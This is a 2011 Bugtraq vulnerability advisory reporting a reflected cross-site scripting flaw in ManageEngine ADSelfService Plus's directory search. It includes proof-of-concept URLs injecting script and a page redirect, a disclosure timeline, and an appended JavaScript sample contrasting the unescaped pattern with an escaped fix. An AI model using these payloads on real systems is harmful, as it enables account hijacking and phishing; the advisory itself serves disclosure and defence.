Cross-Site Scripting Vuln in Zoho ManageEngine ADSelfServicePlus

Board: Bugtraq | Posted: 2011/11/18 07:01
Vulnerability ID: VRPTH-2011-001
Reference: http://jameswebb.me/vulns/vrpth-2011-001.txt

Vulnerability Summary
======================
Non-persistent XSS in Zoho ManageEngine ADSelfService Plus

Test Environment
=================
Windows 2008RC2 fully patched.
ManageEngine ADSelfServicePlus version 4.5 Build 4521 installed.
Integrated Into TestDomain

Technical Details
=====================
Corporate Directory Search feature in ManageEngine ADSelfServicePlus version 4.5 Build 4521 is susceptible to non-persistent XSS attacks. These vulnerabilities are manifest by the ability for attacker to terminate javascript variable declarations, escape encapsulation, and append arbitrary javascript code.

ADSelfService Plus is a password management application for Active Directory environments.

Proof of Concept
===================
Double-Quote String Termination

HTTP Request = https://serverip:port/EmployeeSearch.cc?searchType=contains&searchBy=ALL_FIELDS&searchString=";alert("XSS");//\"

Response Source View

<script language="javascript">
var searchValue = "';alert(XSS)//\"";

Single-Quote String Termination

Similarly...

HTTP Request= https://serverip:port/EmployeeSearch.cc?searchType=';document.location="http://www.cnn.com";//\"&searchBy=ALL_FIELDS&searchString=Bob

Root Cause Analysis
=====================
Input is not being escaped/filtered prior to javascript variable assignment.

Fix/Work Around
=====================
Not aware of patch/fix. Contact Vendor.

Coordination History
====================
09/28/11 - Contacted AdSelfServicePro Team with Vuln. Details
10/07/11 - Requested Update
10/08/11 - Received Response: Advised issues will be handled in future release.
10/27/11 - Requested Update: Inquired if newer posted builds fixed issue.
11/03/11 - Received Response: Newer build did not address; Indicated still researching..
11/17/11 - Released Advisory
Article ID (AID): #1EnP8kRZ (Bugtraq)
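The root cause named in the advisory (input placed into a JavaScript variable assignment without escaping) next to an escaped form, as an added example that is not code from the advisory or the vendor. All function names are hypothetical, and the sample input is the searchString value from the double-quote proof of concept.

```javascript
// Added example, not vendor code. Function names are hypothetical.

// Pattern the advisory describes: the raw request parameter is concatenated
// into a JavaScript string literal inside an inline <script> block.
function renderVulnerable(searchString) {
  return 'var searchValue = "' + searchString + '";';
}

// Escaped form: serialize the value as a JS string literal, then neutralize
// characters that matter to the surrounding HTML parser (<, >, &), to
// single-quoted contexts ('), and to JS line termination (U+2028/U+2029).
function jsStringLiteral(value) {
  return JSON.stringify(String(value)).replace(
    /[<>&'\u2028\u2029]/g,
    (c) => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0')
  );
}

function renderEscaped(searchString) {
  return 'var searchValue = ' + jsStringLiteral(searchString) + ';';
}

// Run a generated statement with a stub alert() and report what happened:
// the value that ended up in searchValue and any alert() calls it triggered.
function evaluate(statement) {
  const calls = [];
  const run = new Function('alert', statement + '\nreturn searchValue;');
  const value = run((msg) => calls.push(msg));
  return { value, alertCalls: calls };
}

// searchString value from the advisory's double-quote proof of concept.
const pocInput = '";alert("XSS");//\\"';

console.log(renderVulnerable(pocInput), evaluate(renderVulnerable(pocInput)));
console.log(renderEscaped(pocInput), evaluate(renderEscaped(pocInput)));
```

With the escaped form the whole parameter stays inside the string literal, so `searchValue` holds the input as data and the stub `alert()` is never called.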